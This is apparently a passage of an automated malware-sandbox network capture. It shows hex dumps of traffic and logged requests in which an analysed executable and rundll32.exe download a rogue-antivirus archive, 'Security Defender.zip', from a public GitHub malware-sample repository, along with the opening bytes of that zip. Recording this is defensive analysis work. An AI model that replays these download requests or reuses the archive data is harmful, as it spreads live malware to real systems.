                                                                                                                                                    2022-09-29 12:59:21 UTC30493INData Raw: 13 35 0f fb d1 c2 87 0e 28 2e 25 ae 6e 79 fe 9c 62 aa 3a af d7 c3 d1 d1 e2 62 64 26 ad 95 ca a9 d8 76 69 a6 27 61 f1 78 85 00 27 3f 8c 79 e4 17 d7 ff 44 b9 d4 7c 7c e0 e0 a9 77 9a 9b 8a d6 5f 52 cd c1 69 8a f6 0b d1 cc d3 dc 2a eb 19 f7 b4 6c aa 2b 7f a4 bd f7 11 a4 df b4 5f 5a f5 ca ec 48 e5 fa 18 e2 e6 ca 18 6b b4 b8 83 ab 1a 1a 06 9d 64 0e bf a9 1a 8f d4 47 98 a0 c9 bc f9 87 26 84 7d b8 c7 16 a2 22 0a 8b c9 ca d0 4a d7 fc 9e 7f 69 b5 28 a8 d5 0e df 13 18 fe 15 9c be 74 a1 bf 7e 76 ec 37 66 15 7b 02 26 e2 ec fc b5 73 db bc ad b0 5e 67 56 4b ae 4b 0e 17 06 18 fc c4 22 1d f4 22 65 c7 5d 8b 30 ce 1d d6 4d c8 09 87 71 f7 b7 79 7b 74 49 03 93 05 ba 9f 05 91 5d 0c 27 81 ef e6 72 3f 37 c3 91 41 43 40 af dd e3 dc 2c 6a 10 fc b8 2f 38 a4 69 26 ea f5 84 cb db 5c
                                                                                                                                                    Data Ascii: 5(.%nyb:bd&vi'ax'?yD||w_Ri*l+_ZHkdG&}"Ji(t~v7f{&s^gVKK""e]0Mqy{tI]'r?7AC@,j/8i&\
                                                                                                                                                    2022-09-29 12:59:21 UTC30509INData Raw: 3c f7 91 32 64 b5 3d d1 b2 06 4e 1b af 98 2e d7 19 f1 91 67 61 67 06 27 fd 5b 4b c0 d6 5b 75 72 60 af fa d5 9b de cd df a3 33 b3 b7 6d f5 dc 3d d8 c7 68 15 5b 76 ed e5 bd 46 4e fd f3 68 32 86 4c b6 42 fc 16 73 3e 02 4b 75 9e 48 d7 3a bb ed 64 9b 7c 93 6a a7 21 ec 6b 57 39 ce 8f 08 10 86 4c b3 93 19 f6 77 cb 36 bf 6c 6a e2 66 78 d6 fc ba ab 36 fc 89 76 d3 d8 93 79 37 57 be 55 62 2c 5b 00 54 42 04 c6 60 73 c0 87 a3 d1 02 d4 5b b8 d1 3c 55 d1 d4 f6 bd 90 4f 79 e7 82 19 95 08 a3 8e 26 55 5c 8d af cf 6d ce 47 d4 12 93 8c 97 97 f5 39 cf 0d d3 86 62 9e bf d0 a1 11 d5 86 6b bc f8 22 1f b8 38 c7 84 a8 d5 8c 4d c5 b9 11 08 bf 0b 7f 5b 97 eb e3 fe 96 e2 f2 aa f2 ef f2 c3 6c 8e e9 65 3d 43 6f d9 c2 5c 9b b0 fe 91 d5 4a c6 fd 8e ba dc 1b fd 57 01 5e 08 ed 7b 5a f6 c4
                                                                                                                                                    Data Ascii: <2d=N.gag'[K[ur`3m=h[vFNh2LBs>KuH:d|j!kW9Lw6ljfx6vy7WUb,[TB`s[<UOy&U\mG9bk"8M[le=Co\JW^{Z
                                                                                                                                                    2022-09-29 12:59:21 UTC30525INData Raw: 3c ca 33 51 61 cf 3a e8 8b 0b 7e 04 e5 d3 1b 2f e4 08 f1 92 04 30 af 1c 90 fb 54 fd e4 93 83 49 6e 87 50 1e 87 ba 64 9d 7b 24 a3 c2 0a dc 08 1e 00 99 8c 7a d1 b6 4a ad a9 1e 9e 45 b1 ff ca d4 b7 3b 1b df 50 05 a7 6c 1b ad 46 00 5d ce 1e 91 15 1f bb a6 d6 50 92 f5 25 3d bd a6 43 25 c2 d7 26 18 a7 e6 66 f0 fd 6a f5 97 bd 8e 73 be ee e3 45 8f ac b2 c5 6c 32 fa ab cf c1 18 a2 a9 7b 6b 03 b9 de 9a e6 b0 6a b1 7e 60 89 c4 29 bd 3d 6d 94 09 25 be 62 c9 e3 63 f9 ed bb 8c 81 0c 4c d8 cb 93 55 e5 55 29 25 cf 10 e5 43 3a f1 03 70 c3 06 f4 fd 26 98 7b 9a 5c 16 a6 88 9f 23 50 7d 62 62 55 d2 69 ed 34 f6 19 1b ff 24 ed bb 47 f9 f1 99 e8 ff 57 ab 29 93 c5 a7 43 38 6a 6e e8 7e 7d d9 ab 16 0a b7 5b 62 c6 10 2b 78 9c 72 4b d2 82 9f ce 1e 66 45 c1 b2 81 be f8 7b f0 53 d4 fc
                                                                                                                                                    Data Ascii: <3Qa:~/0TInPd{$zJE;PlF]P%=C%&fjsEl2{kj~`)=m%bcLUU)%C:p&{\#P}bbUi4$GW)C8jn~}[b+xrKfE{S
                                                                                                                                                    2022-09-29 12:59:21 UTC30541INData Raw: f7 79 6e 7d 6f c1 80 ec 9e bc 39 9b c2 98 d1 49 9f dc 5e 3d 7d 74 0e 67 6e 6c 90 e5 c3 65 76 37 f7 b5 9a 31 88 61 81 01 2c 86 80 f7 f1 4c f4 ab 8c 76 97 06 fb f9 b6 c8 94 3e 07 5d 4b 7e d7 7a 78 d0 f2 b9 c6 5c 46 4c fd 98 5c 1b a2 d5 31 ad 99 c6 0f 45 9c 8d 5e 22 07 35 ba a6 b5 a7 00 87 1c d6 34 9b 49 52 4a 31 84 ce e5 8b 40 14 19 b3 43 0f 37 6c 32 15 f1 33 a3 ca f5 9f 41 fd 39 97 10 84 bc 22 2d 7c 76 8c f7 a5 f0 db fc b2 bd 1a 36 22 21 67 33 0e 25 6b 24 00 10 97 32 b8 54 10 33 08 ad fc ad e4 61 84 e1 66 20 da a5 67 d3 7b 57 e2 34 cb c0 94 17 f2 06 b5 6e 9b dd 83 a2 e3 51 7a 7d e0 3d 06 36 e2 8d b3 f9 d1 5a 04 96 23 c7 59 bf a9 b5 96 0c 00 67 68 d5 0d 97 ee 51 26 db ae 2c 72 c9 bb 2c 44 7f 11 21 76 8a a5 36 f2 8c 8c 81 2d f1 e8 78 f6 4c 9f 38 92 bb 7d c7
                                                                                                                                                    Data Ascii: yn}o9I^=}tgnlev71a,Lv>]K~zx\FL\1E^"54IRJ1@C7l23A9"-|v6"!g3%k$2T3af g{W4nQz}=6Z#YghQ&,r,D!v6-xL8}
                                                                                                                                                    2022-09-29 12:59:21 UTC30557INData Raw: 6e 17 dd 4e 09 9c d7 31 b6 00 f4 06 1e ed 6e 31 81 58 d5 f7 f2 ac fd b9 87 27 4c 90 25 35 10 67 c3 2e 69 e8 52 04 71 f7 be 3d f2 0b 7e 62 d0 8b c8 f8 0e 11 0a fa 3e bc 5c 3d 06 44 95 4f f4 d1 fc 71 11 e0 fd ea 41 81 0f 01 ce 10 cc d9 47 09 bd 56 16 52 04 3f 3f a5 d6 29 1a 5e ee 23 13 6e ff 93 eb 23 92 d9 f4 ef 23 ba 38 bc 27 fc 25 34 e5 30 a0 51 e1 d4 a3 a2 96 2d 3b 0a 72 03 8f 33 78 7b 54 1a fd 2c 8a 78 3f 67 68 63 80 4a 8c 5d 76 72 1b c8 5b f9 f0 d2 71 42 29 d6 b0 ee f3 5e c2 84 10 22 1a 02 5d 9f e1 8c c5 e1 dc a3 47 f8 de 3e f0 88 fc b2 52 b6 b0 4d 4a e8 e7 d9 14 aa 6f b4 b9 d8 3d b5 b0 23 8b 77 ca 1a a6 d0 e5 6d d0 97 a6 62 d1 4f 83 58 0c 97 ba 9e 60 70 db 5a a3 8f e9 db 8b 6b 1d e1 9a ba 58 ee a5 2b b1 a8 8f ee ed 51 dd 2c 6b 7c 18 cc 76 47 4b b7 13
                                                                                                                                                    Data Ascii: nN1n1X'L%5g.iRq=~b>\=DOqAGVR??)^#n##8'%40Q-;r3x{T,x?ghcJ]vr[qB)^"]G>RMJo=#wmbOX`pZkX+Q,k|vGK
                                                                                                                                                    2022-09-29 12:59:21 UTC30573INData Raw: 0b 01 03 c5 7c 3c a8 3e e6 07 eb d9 19 69 53 ad 9d 63 fe 6b 82 58 49 3f 57 a8 75 b7 67 20 1f 78 67 b8 82 94 cf 40 02 83 10 1b 67 e4 a3 42 b7 d2 ec be 1b e2 c9 8d 55 f3 aa 34 b0 e2 a1 79 30 3e ef dc d4 36 28 b6 68 0c 5d 7e 83 53 c7 5f 0e 72 0a 28 78 a7 2a 89 b6 33 23 58 a8 b6 5b bd ea 23 70 ed 91 11 e7 4f b0 8d 36 82 d3 5b 4a 7f e6 07 f1 ac bd 4f cb c4 4d 96 ae 9e 2b 75 da f4 cd 4b 18 f6 55 5b 40 42 71 56 c3 09 51 15 50 72 66 79 f3 17 be 0b 8c e1 78 a0 a8 65 c4 52 5b 0c a3 25 f0 d7 ed 50 bc 28 0f 58 7e e8 a1 41 50 b9 ba e4 a2 6e 55 48 da ba 35 40 95 5e da 2c 44 90 6a c9 f7 c5 07 5a e5 8f 88 e6 76 78 91 8c e3 5c b5 e1 a4 b1 7e 6f ed b1 92 eb 76 5a 44 d3 d1 55 a3 48 32 1e 66 73 bc d3 69 83 bf f7 ee b1 29 c5 b7 d3 ca e8 a2 34 4b ed 45 f5 97 46 e1 10 e0 14 8a
                                                                                                                                                    Data Ascii: |<>iSckXI?Wug xg@gBU4y0>6(h]~S_r(x*3#X[#pO6[JOM+uKU[@BqVQPrfyxeR[%P(X~APnUH5@^,DjZvx\~ovZDUH2fsi)4KEF
                                                                                                                                                    2022-09-29 12:59:21 UTC30589INData Raw: 8d 01 9e 3f a0 16 2e 30 ba 2a 99 4c 48 69 59 2d 0b 9e c9 a5 be 57 d5 48 6e b0 bb e3 9a c4 ce 7a 0f 32 8a df 39 58 47 16 f3 cd 22 d7 bf 1a bf dc e5 5c 31 30 a1 a8 ac 77 ed f4 7c 65 fb c1 1e 37 bf fc 8a 26 d3 14 02 bd bc 28 8d 34 fa 91 05 72 1f d4 61 3d 2e 4d 63 fb c4 e3 91 bf cd da 09 00 31 a6 c1 7a 41 38 69 1d b7 3a b7 99 e4 ff 5b d2 34 8e 93 1b 12 c4 d1 9a 3d 84 1c 89 55 b5 ce de 01 e7 8c c6 55 95 08 1f d4 a8 4a 66 d2 db fc 93 52 ab 09 62 7d 58 91 05 fb c6 07 0d a1 1d b3 0a 7c 79 79 e1 01 05 ec d4 da ed 99 6f 4a 21 89 6f 22 fc 1e dd f3 54 6f a6 53 e8 1b c4 dc dc ce 1d 6a 23 43 40 30 a9 cc 51 33 26 b6 a3 70 72 45 a6 b9 ae 74 ff e8 35 b2 dd d4 05 9c 46 85 df dc 86 4e 34 84 d1 d8 33 86 8d 0e 71 4f 78 02 6a 0c 49 1f 8e 90 2c c0 71 a8 63 d3 ba 0c 78 0d 57 08
                                                                                                                                                    Data Ascii: ?.0*LHiY-WHnz29XG"\10w|e7&(4ra=.Mc1zA8i:[4=UUJfRb}X|yyoJ!o"ToSj#C@0Q3&prEt5FN43qOxjI,qcxW
                                                                                                                                                    2022-09-29 12:59:21 UTC30605INData Raw: 92 90 41 38 01 64 f9 c7 9a 18 61 f7 c3 56 34 50 be 37 34 bc 68 58 3f b1 36 1a 51 29 15 29 c2 65 f5 aa 20 09 d3 fc 75 7f b8 e9 d2 87 6f ce f4 c1 57 79 05 5d e1 c3 d0 ae 95 2a ab ed 3a bb c6 c0 d0 71 73 6a ec 15 bf 7c ab ab 6d ee d6 27 ed 28 0a c5 0d 89 8b 26 98 81 c4 75 64 51 71 30 3d 46 56 c6 be e3 a9 d0 1b d3 59 07 14 0d f1 c7 15 88 97 a0 49 bc ce a1 09 39 2c 47 ba aa 68 f3 d8 b1 a8 e9 4a 63 e1 c3 4e 6d da ed ec e1 68 29 58 5b bc dc 76 de 48 21 0a 51 58 36 5e 6c 1d e0 2c c1 5b 84 74 93 4c 1e 33 4f 2d f7 af ad 41 ee ad 97 80 a6 7f 33 ec 0c 66 db c3 6c 28 3e 07 17 77 47 13 46 86 2f 53 05 fb 46 03 7f 3b 23 63 10 ad 43 15 6e a2 78 ba 29 f1 b8 33 3d 0c e9 d0 1d 95 2e 83 7c 9b 3c 88 c3 7d e8 13 02 c3 9e 7b 72 f8 7c 9d b7 43 b3 1a 3e 6a 91 b2 97 57 37 11 0c 7c
                                                                                                                                                    Data Ascii: A8daV4P74hX?6Q))e uoWy]*:qsj|m'(&udQq0=FVYI9,GhJcNmh)X[vH!QX6^l,[tL3O-A3fl(>wGF/SF;#cCnx)3=.|<}{r|C>jW7|
                                                                                                                                                    2022-09-29 12:59:21 UTC30621INData Raw: e9 7d 4e ef 5f 5d 66 1f d3 6b 27 59 db 3a ff ba 17 f5 98 88 a8 ef 37 b0 bb 93 dc b6 8b 69 f0 8d 27 66 e6 ff b5 97 13 f1 11 97 58 27 0e eb 82 d4 15 02 69 ca 39 8e 90 b8 b9 75 4e 66 bd 98 20 77 c4 2b 9d 57 f8 aa 93 c7 4d 3f fe c6 4f 04 57 1d 9f cd 63 7c 60 31 3e 19 c5 14 8b 6a a2 8d dc 37 3f 6a 17 37 30 d0 8a 7d 83 e5 ec 06 31 f8 fe 29 3a 69 9d 69 33 f2 b9 34 bf 5a da 18 18 60 fd 4a 05 b3 04 ae 06 e0 e9 b6 fe 0f 05 94 61 99 c8 9c a0 bd e1 9c bf c0 62 af ad 72 6e b7 b6 35 6b e2 31 62 9d 3b 41 c9 5d 1f 85 cf 67 a1 79 ad e1 9e b2 b7 9a bb 98 c5 4e 46 df 77 17 7b 4f b1 e0 71 b6 4b 7a 48 6d 7b 53 b9 0c eb 73 e2 d0 58 69 6b 3a ce 6e 28 e8 ce f4 ce 80 97 9c d0 29 af 59 1e ac f3 3d 45 04 51 8e b2 b1 45 e5 b8 e4 69 f1 ca 24 16 4f 18 38 81 af 99 1e ec 59 50 c2 8a 5a
                                                                                                                                                    Data Ascii: }N_]fk'Y:7i'fX'i9uNf w+WM?OWc|`1>j7?j70}1):ii34Z`Jabrn5k1b;A]gyNFw{OqKzHm{SsXik:n()Y=EQEi$O8YPZ
                                                                                                                                                    2022-09-29 12:59:21 UTC30637INData Raw: dd 91 8f 9c 80 be f2 5c 68 ab f4 e6 4f f2 eb 16 73 56 82 b0 06 b7 7f ea 9f 22 97 40 48 1c 8f ce 80 c4 71 bf 8d 9c 99 5a ef 6b df c5 a2 99 eb 87 0f b1 fc 75 5a a3 f5 5a a0 76 3f 96 81 39 05 99 d9 9d 06 8f b9 e6 f8 40 d9 c7 3f e7 5a 27 c6 fd b1 ce 8b f3 f5 3b 13 cb 2a 90 36 a1 0a 2f 43 bb c0 a4 48 ce 86 5a 61 df 2d 58 30 05 5d 42 15 3c bf 05 d6 6b fa b0 38 9f b2 ba 59 19 10 52 b8 71 8f 21 28 8e 4a 53 b9 6b d7 92 8f 91 ef 8a 76 ca e0 1a 5b 6e 2d b9 59 96 b8 94 0e 69 21 9c 55 b0 fb 8a a4 24 de d8 f4 7e 23 56 20 39 7f 8d 4f 8e 64 c0 80 2f 23 e9 fe 88 78 e7 90 e9 a8 33 16 7f c5 70 53 ff d6 73 e3 8c bf 6c c0 23 18 3c 53 5f ef 58 a4 eb 27 33 1c 8d 51 f2 db 13 f2 d0 e8 d8 97 4a a4 bd ba 77 78 c8 6b 8f 60 8c bf ce b9 b5 cc a0 43 5c 8e e7 3d 4f 73 1a 47 99 61 0b 21
                                                                                                                                                    Data Ascii: \hOsV"@HqZkuZZv?9@?Z';*6/CHZa-X0]B<k8YRq!(JSkv[n-Yi!U$~#V 9Od/#x3pSsl#<S_X'3QJwxk`C\=OsGa!
                                                                                                                                                    2022-09-29 12:59:21 UTC30647INData Raw: 35 13 45 9b a6 47 ef b1 88 8a be 0e 2f 2c 4b d0 88 ae 8a 9f 41 a0 a6 74 90 d6 b8 51 b0 cb 31 25 3d 3e 0f 49 62 8e a2 4d f7 ec c7 95 90 1e ff 05 b4 a3 c3 66 67 23 64 1a 8d f3 37 b2 c4 ff f1 ce bd f7 08 29 25 08 63 62 7f 6b b2 0b bc 19 00 7e 33 c1 48 ba a5 97 0b ec e2 b0 65 33 d0 01 59 09 c8 29 21 ea 70 d2 18 49 fe 23 1d e8 f1 aa 1e 83 3d 08 3e de 27 00 63 05 5d 88 81 4a eb de 9c ea 2f 33 4d dd 9f cd 31 59 57 a1 60 ec f5 3c 9c 5e 4d 08 82 8e 72 e4 4a b9 2f 4b da 01 c2 84 be 96 b1 94 83 18 ac b4 71 06 b9 24 e5 65 ed ac 46 c9 bc 62 45 b4 02 41 3f ce 2e 8f f7 47 45 74 da 22 b1 7f ad 0f cb de 46 fb a0 7e de d3 01 30 de 19 49 46 9d 1c c2 21 8f 5a c4 de 87 7f ec c5 fb d7 6b aa 38 50 a0 96 a9 5e 07 4a 5f c3 ca 45 86 30 93 0e 29 fa 6b 4b 6f 6d 9c fb 31 70 9c b6 df
                                                                                                                                                    Data Ascii: 5EG/,KAtQ1%=>IbMfg#d7)%cbk~3He3Y)!pI#=>'c]J/3M1YW`<^MrJ/Kq$eFbEA?.GEt"F~0IF!Zk8P^J_E0)kKom1p
                                                                                                                                                    2022-09-29 12:59:21 UTC30663INData Raw: a4 80 6a 81 61 c5 9b b3 72 82 85 8e 44 d9 39 cf fa 1f 2b 68 17 40 84 0e a9 35 a1 ca 0a e0 06 0a 22 bd d0 31 75 82 d6 c0 05 f5 94 5e 7e 76 1d 27 fe 84 84 d5 01 0d 09 8b 8a da 7c 2d ac b2 22 28 28 f4 a6 2f 03 b5 d1 0a 17 fe ac 2e 9d b5 c5 03 ff 2d 9d 57 72 4c 48 c7 88 4d a6 e9 ea 3b 8c 7c 5c ee 62 60 e3 4c 28 67 7a 80 61 36 fa 48 d7 8e 25 3e 8d e8 88 58 05 29 0a 50 11 02 ee f2 3d 89 3a ac a3 c1 38 f8 a6 8a 94 31 9f 4a 55 50 9f c8 96 5e 30 4b 8a 31 39 9a fd 97 c6 ab 41 62 5b 68 6e 16 59 8e e2 da c6 13 39 ad 4a 05 3a 3d 26 15 18 a3 0d e3 1a 8e 34 3b 68 8e a0 81 f9 b4 c1 88 91 ff 7b 4c 93 e4 67 7f 10 91 60 00 dc 55 69 7f 6b bc b4 f1 60 19 56 44 d9 4b b6 cc f2 28 69 3f ab a3 fb ab f0 b5 5a bd 97 97 8c bd e2 f4 30 b2 2a 87 08 2d d1 6e e2 a6 5f 21 d0 41 13 a2 cb
                                                                                                                                                    Data Ascii: jarD9+h@5"1u^~v'|-"((/.-WrLHM;|\b`L(gza6H%>X)P=:81JUP^0K19Ab[hnY9J:=&4;h{Lg`Uik`VDK(i?Z0*-n_!A
                                                                                                                                                    2022-09-29 12:59:21 UTC30679INData Raw: af 15 e8 22 69 3a 69 8f 27 07 9f b6 b6 10 ae 15 06 6b 6c 87 2d 68 41 5b f5 9d 6f 8e e5 14 e4 0a 1b d1 1b 08 6c 6c 49 e6 40 8b dc eb cd 9e f7 39 fc 2b 4c 63 51 e2 cd 59 91 ad 8e c3 a6 42 3e 61 cc 3c 23 65 17 1d 06 a5 c0 a3 45 5d e4 8a ef 07 86 f7 9f 32 fd f1 99 27 4b 29 07 d3 7b 7e f6 1d f5 12 48 eb 46 b5 5d bb 3a ea 92 fe 15 50 2b 11 12 85 6e c6 83 78 0f 6b 61 15 e9 cf 0e 15 63 2b a4 f3 5b ed 18 d7 7a 26 38 f9 55 e5 00 de 42 f0 b1 10 00 4e c6 6d aa 40 74 6b f8 1f 39 91 c8 4b b9 0b 45 b3 9c 43 01 72 92 a9 97 cd 90 6d 55 0c e8 33 bd 8c 5e 8f f7 72 73 8d ce 8c 00 7e a3 2b 2f 36 7b 7f fd df 09 d4 47 37 b7 27 14 98 1f 1e c6 10 0f a3 ac 75 5f 2f 2a 50 25 f5 5c de f7 3a 2c fb 54 82 08 4c a2 88 30 84 7e 3c a9 7d c4 f8 a8 6c 73 20 88 04 61 95 18 2b 5e f0 0f a5 db
                                                                                                                                                    Data Ascii: "i:i'kl-hA[ollI@9+LcQYB>a<#eE]2'K){~HF]:P+nxkac+[z&8UBNm@tk9KECrmU3^rs~+/6{G7'u_/*P%\:,TL0~<}ls a+^
                                                                                                                                                    2022-09-29 12:59:21 UTC30695INData Raw: 91 03 94 6b 19 81 f8 08 61 06 1f ca a4 fa 20 9d d6 c6 d8 76 31 2e 1b 03 03 42 3d 8f bd 00 ec 89 d0 be 30 8e ba d2 b5 31 79 50 54 6b 71 4e 5a df 23 1a 11 47 3c d1 6d 2a 8c a4 43 e0 00 24 ff 2f 7c d2 c7 d2 f4 e9 50 cb 0c 3d db 92 a3 d7 1f a6 ad 94 81 b8 9e 29 02 3e 1c c7 6e bb 78 6a 81 2f 4b 7a 5c aa 33 ca 2d 1c 66 51 75 4b f7 85 fd a4 9a 44 aa 22 90 83 e5 dd e2 a4 fd 4c 44 e2 ac f3 71 70 42 ad cd f6 61 be 98 ab 16 8c 59 55 bb 17 35 44 8c 58 b2 79 98 b8 87 86 0e 1c d5 a7 a4 0e fd 1c 10 71 4d fb ef 1b db d6 ee 7b b3 a6 12 89 d3 1b 7c cf 4d 44 8c ba 7c 03 16 60 6a 07 ab bd 2b 4b 6b 3e 74 d6 85 3d 7a 09 a2 27 0a 75 c3 e7 cd 7c bd a9 d0 33 ac cf f3 36 99 0b f7 91 8c e8 7f 00 e3 d8 3a 53 f2 cd b6 9c 0a ba cc 6a 43 3c a6 65 4d 9b 72 29 80 7c 22 d7 63 f9 39 d5 52
                                                                                                                                                    Data Ascii: ka v1.B=01yPTkqNZ#G<m*C$/|P=)>nxj/Kz\3-fQuKD"LDqpBaYU5DXyqM{|MD|`j+Kk>t=z'u|36:SjC<eMr)|"c9R


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    117192.168.2.349766140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:21 UTC30709OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    118140.82.121.3443192.168.2.349766C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:21 UTC30709INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:57:26 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Security%20Defender.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:59:21 UTC30710INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    119192.168.2.349767185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:21 UTC30712OUTGET /Endermanch/MalwareDatabase/master/rogues/Security%20Defender.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    12185.199.108.133443192.168.2.349713C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:52 UTC588INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 116134
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "591eaf40b2c1654824c7b57ace22a858e557d50f2bd61e6d218bc09b4c052c63"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 33D4:39B3:7C75A4:8A0A06:6335930F
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:58:52 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6928-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456332.162663,VS0,VE1
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: f799ccaeb57ba15c83a6bdf0972d5a669a266ede
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:03:52 GMT
                                                                                                                                                    Source-Age: 214
                                                                                                                                                    2022-09-29 12:58:52 UTC589INData Raw: 50 4b 03 04 14 00 01 00 08 00 0f b9 98 3f 08 02 e3 81 f6 c4 01 00 00 d2 01 00 15 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 42 69 72 65 6c 65 2e 65 78 65 78 87 52 7a 1b 81 59 80 6e db ec 5d ee 26 6d 7c 09 66 bf 9b 5b ca c3 1f 74 30 22 7f 86 ac 21 7f ce 7d ef 5b c1 ea 5b 7a d1 dd b0 eb 9b 49 ce 14 14 68 6b 08 48 f5 ec a4 42 03 54 02 12 f6 9d 93 01 c2 cb 0f e2 c9 32 64 50 3b 29 65 4b c7 74 fb 81 69 1a 6f ea cc bb e0 e3 53 1a 43 74 5f 3b 59 df ff a6 59 84 cb 71 1b d4 44 3c e2 d1 f6 be 7b b7 a0 62 95 ae e0 1f d7 0b 6b 49 83 79 23 5c 2d cd 1a 45 47 6d c5 92 5f c5 70 88 d9 7e 4d 94 8b d3 5c a7 b8 c3 66 c3 60 fb 0e 89 2c e7 e4 b3 65 32 70 be fd 5f 58 7b 5e ca c4 22 8d 5e 0f d8 7e 6d 13 c2 f0 ff c8 0a 43 f1 0e ab 32 bd 72 24 c3 10 03 39 3e 75 13 eb 26 26 11 a6 bf
                                                                                                                                                    Data Ascii: PK?Endermanch@Birele.exexRzYn]&m|f[t0"!}[[zIhkHBT2dP;)eKtioSCt_;YYqD<{bkIy#\-EGm_p~M\f`,e2p_X{^"^~mC2r$9>u&&
                                                                                                                                                    2022-09-29 12:58:52 UTC590INData Raw: 8a f5 7c 29 39 16 89 76 c1 a8 b3 1b f0 ef c9 78 a0 8b f8 2f 0e f5 bc e8 c7 0e 5c 35 e1 40 e5 1a a3 c3 53 a1 36 11 3b 2f 25 b5 ef 8f d7 97 89 98 bb e4 eb 9a a6 35 a2 4a 6c eb c9 37 fa 9a ae 7b e5 5c a5 51 a5 d7 58 98 ee 57 4c 6d 06 c0 ec 8c b0 1f 06 85 dc c3 98 82 bc b9 be 0d 30 b8 4b a2 ae 0c 08 19 f3 d3 16 56 c4 87 92 5b 25 12 36 61 be ee 29 11 14 92 10 ba 7e cc 2d 28 bf 0f 8d c5 9f c4 46 dd cb 6a 4f 9d a0 fe ef 2b ca 6b e5 ee 2a 5a 1a 0a 15 85 78 d8 62 0c 3b ba 6f 42 d2 7b e6 1f 39 69 40 5c 35 1c d6 18 4f 2e 5f 56 f5 de be fe b6 81 4d f3 c4 84 09 5f e7 8b e0 28 ea 1c c8 69 a0 33 1b 65 e5 03 1e 6e af ec 02 6c f0 23 42 89 f9 85 a1 a2 88 55 cb a4 af 47 98 f7 32 57 d0 75 55 e8 58 37 6b aa 95 a8 b4 f2 d4 fa 98 58 07 4c 42 4a 70 9f d2 ea c8 57 37 9b 85 c0 d5
                                                                                                                                                    Data Ascii: |)9vx/\5@S6;/%5Jl7{\QXWLm0KV[%6a)~-(FjO+k*Zxb;oB{9i@\5O._VM_(i3enl#BUG2WuUX7kXLBJpW7
